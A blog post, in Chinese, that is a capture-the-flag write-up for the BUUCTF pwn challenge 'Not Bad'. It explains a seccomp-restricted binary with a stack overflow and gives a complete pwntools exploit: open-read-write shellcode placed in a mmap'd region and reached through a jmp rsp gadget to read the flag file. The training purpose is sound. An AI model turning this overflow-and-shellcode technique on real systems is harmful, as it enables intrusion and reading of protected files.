[BUUCTF]PWN——[極客大挑戰 2019]Not Bad (orw_shellcode)

原創 osc_38nccbkz 2021-02-02 21:31

[極客大挑戰 2019]Not Bad

附件

步驟

  1. 例行檢查,64位程序,沒用開啓任何保護
    在這裏插入圖片描述

  2. 本地試運行一下看看大概的情況,根據程序提示,是個簡單的shellcode,按照經驗,肯定不簡單
    在這裏插入圖片描述

  3. 64位ida載入
    在這裏插入圖片描述
    百度一下關於mmap函數的介紹
    把從0x123000開始的地址,大小爲0x1000的長度,權限改爲可寫可執行
    sub_400949(),沙盒過濾
    在這裏插入圖片描述
    使用seccomp-tools dump ./bad查看一下哪些函數可以使用
    在這裏插入圖片描述
    發現只有read,write,open,exit可以使用,估計這題應該是使用open-->read-->write這樣的orw的方式獲取flag了
    sub_400906()
    在這裏插入圖片描述
    sub_400A16(),明顯的溢出漏洞
    在這裏插入圖片描述











  4. 這題的思路很簡單,寫入orw類型的shellcode,然後跳轉去執行,buf的大小隻有0x20,感覺不夠我們寫全rop攻擊鏈,程序一開始的時候給我們開闢了0x100可執行的空間,打算在這邊寫shellcode,然後利用buf的溢出跳轉過來執行我們的shellcode

  5. 先寫一下orw的shellcode

mmap=0x123000
orw_payload=shellcraft.open('./flag')           #打開根目錄下的flag文件
orw_payload+=shellcraft.read(3,mmap,0x50)       #讀取文件標識符是3的文件0x50個字節存放到mmap分配的地址空間裏
orw_payload+=shellcraft.write(1,mmap,0x50)      #將mmap地址上的內容輸出0x50個字節

關於文件描述符fd的具體看這篇文章,我這邊簡單說一下。
read裏的fd寫3是因爲程序執行的時候文件描述符是從3開始的,write裏的1是標準輸出到顯示器,這些知識點在我給的鏈接裏有。

  1. 接下來寫一下buf裏的rop攻擊鏈
    buf裏的rop攻擊鏈要完成的任務是往mmap裏寫入orw_payload,讓程序跳轉到mmap去執行orw_payload,確定目的後開始寫rop攻擊鏈
payload=asm(shellcraft.read(0,mmap,0x100))+asm('mov rax,0x123000;call rax')#buf裏的rop是往mmap裏讀入0x100長度的數據,跳轉到mmap的地址執行

這樣buf裏的rop就達到了我們想要的目的,下面就要想辦法讓buf裏的內容被執行
發現該程序有jmp rsp,利用它可以跳轉到buf去執行,buf地址是rsp-0x30,
sub rsp,0x30;jmp rsp小於8字節滿足要求。在這裏插入圖片描述
buf處的完整rop攻擊鏈


jmp_rsp=0x400A01
payload=asm(shellcraft.read(0,mmap,0x100))+asm('mov rax,0x123000;call rax')#buf裏的rop是往mmap裏讀入0x100長度的數據,跳轉到mmap的地址執行
payload=payload.ljust(0x28,'\x00')#buf的大小是0x20,加上rbp0x8是0x28,用’\x00‘去填充剩下的位置
payload+=p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp')#返回地址寫上跳轉到rsp
p.recvuntil('Easy shellcode, have fun!')
p.sendline(payload)

這樣buf裏面的rop也構造好了,剩下的只要傳入orw_payload即可讀出flag

完整exp

from pwn import *

context.arch='amd64'

elf = ELF('./bad')
p = remote('node3.buuoj.cn',28461)


mmap=0x123000
orw_payload = shellcraft.open("./flag")
orw_payload += shellcraft.read(3, mmap, 0x50)
orw_payload += shellcraft.write(1, mmap,0x50)

jmp_rsp=0x400A01
payload=asm(shellcraft.read(0,mmap,0x100))+asm('mov rax,0x123000;call rax')
payload=payload.ljust(0x28,'\x00')
payload+=p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp')
p.recvuntil('Easy shellcode, have fun!')
p.sendline(payload)


shellcode=asm(orw_payload)
p.sendline(shellcode)
p.interactive()

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

深入解析RealWorldCTF 2024體驗賽PWN方向題目

前言 本報告旨在對RealWorldCTF 2024體驗賽中的Pwn方向題目——"Be-an-HTPPd-Hacker"進行深入解析和講解。該題目涉及一個十一年前的項目,其基於C語言實現了HTTP協議。我們將通過對該協議進行棧溢出攻擊,探

原創 2024-02-22 00:11:18

一篇文章玩明白Stack-migration

前置知識 Intel彙編,棧溢出利用,基礎rop鏈 Stack_migration介紹 當我們發現存在棧溢出漏洞,但是溢出字節非常小,比如0x10的時候我們就需要利用棧遷移,將棧遷移置足夠大的區段去編寫rop鏈 以達到我們利用的目的。爲

原創 2021-12-25 21:11:41

buuoj Pwn writeup 31-40

31 [Black Watch 入羣題]PWN 這個題有問題,就給了個附件,給的鏈接nc都連不上,做做題算了。 保護 可以往bss上寫東西,然後有個溢出,但是溢出有限,只能覆蓋到返回地址。 因爲開了NX,所以不能寫shellcode,因爲

osc_5l7bcj86 2021-02-08 09:25:30

一次受益頗多的CTF(RE/PWN)

前言 這個是Hgame_CTF第三週的題目,難度一週比一週大,而且還涉及了多方面的知識,一整期做下來對或許會有一個比較大的提升。其中有一道逆向,是通過監控本地端口來獲取輸入的,第一次接觸這種輸入模式,故藉此機會記錄一下。 pwn ROP

原創 2021-02-02 21:10:20

《征服C指針》讀後感

之前看了《有趣的二進制》,多少算是瞭解了shellCode的含義,對於ROP和Metasploit只是知道了大概作用,PWN果然還是比較難。 之前做CTF練手時,經常用IDA的F5,但對應的C程序有很多指針操作,而我對指針已經陌生,因此專門

原創 2021-01-30 10:40:38

XCTF pwn 高手進階區 250

查看保護 靜態鏈接 IDA打開,查看程序流程 自定義的print函數 這裏外面傳來temp並拷貝到v3中,但是沒有考慮長度,存在棧溢出漏洞,溢出長度0x3a 那麼可以考慮i386的rop 控制對應的寄存器爲對應的值就可以獲得shel

osc_ie20bwji 2021-01-30 09:53:42

CSAPP實驗——AttackLab

Attack Lab 緩衝區溢出攻擊實驗 這是CSAPP課程的第三個Lab。 實驗準備 實驗介紹 簡介 本次實驗涉及對兩個具有不同安全漏洞的程序進行五次攻擊,攻擊方式分爲兩種 Code injection代碼注

osc_ezv5988m 2021-01-30 09:14:44

南寧安全賽

format 規律總結 先確定格式化字符串相對偏移 abcd%0$p -------->n=0 abcd0xffd8b07c -------->n=1 abcd0x400 -------->n=2 abcd0xffd8b524

Maxmalloc 2020-06-16 08:59:16

通過利用fini_array部署並啓動ROP攻擊 | TaQini

TaQini852 2020-05-09 10:57:10

界面組件DevExpress Reporting v24.1預覽版 - 擁有原生Angular報表查看器

DevExpress Reporting是.NET Framework下功能完善的報表平臺,它附帶了易於使用的Visual Studio報表設計器和豐富的報表控件集,包括數據透視表、圖表,因此您可以構建無與倫比、信息清晰的報表。 下一個主要

原創 2024-05-14 12:21:34

go-kit學習指南 - 中間件

原文:https://blog.fengjx.com/pages/d6f092 介紹 go-kit的分層設計可以看成是一個洋蔥,有許多層。這些層可以劃分爲我們的三個領域。 Service: 最內部的服務領域是基於你特定服務定義的,也是

原創 2024-05-14 12:17:31

go-kit學習指南 - 基礎概念和架構

原文:https://blog.fengjx.com/pages/40737e 介紹 go-kit 是一個微服務開發工具集,並不算一個完整的框架。根據工程實踐總結的一套開發規範,解決分佈式開發中的常見問題,它同樣也適用於單體服務開發。

原創 2024-05-14 12:17:28

go-kit開發微服務 - 服務註冊與發現

介紹 go-kit 內置了多種註冊中心支持,包括: consul dnssrv etcd eureka zookeeper 以下以etcd3爲例,實現服務註冊與發現功能。 實現步驟 準備工作 安裝 etcd:https://etcd.i

原創 2024-05-14 12:17:27

datax mmsql 同步異常記錄

上游一個mssql表還在往這張表裏面做相關操作,然後同步任務執行一半的時候報異常了: [INFO] 2024-05-14 09:39:44.678 +0800 - -> 2024-05-14 09:39:43.939 [job-0] ER

原創 2024-05-14 12:08:54

JDBC連接openGauss6.0和PostgreSQL16.2性能對比

本文分享自華爲雲社區《JDBC連接openGauss6.0和PostgreSQL16.2性能對比》,作者: Gauss松鼠會小助手。 PostgreSQL vs openGauss 01 前置準備 安裝JDK: 詳細安裝步驟請問度娘,輸

原創 2024-05-14 11:00:08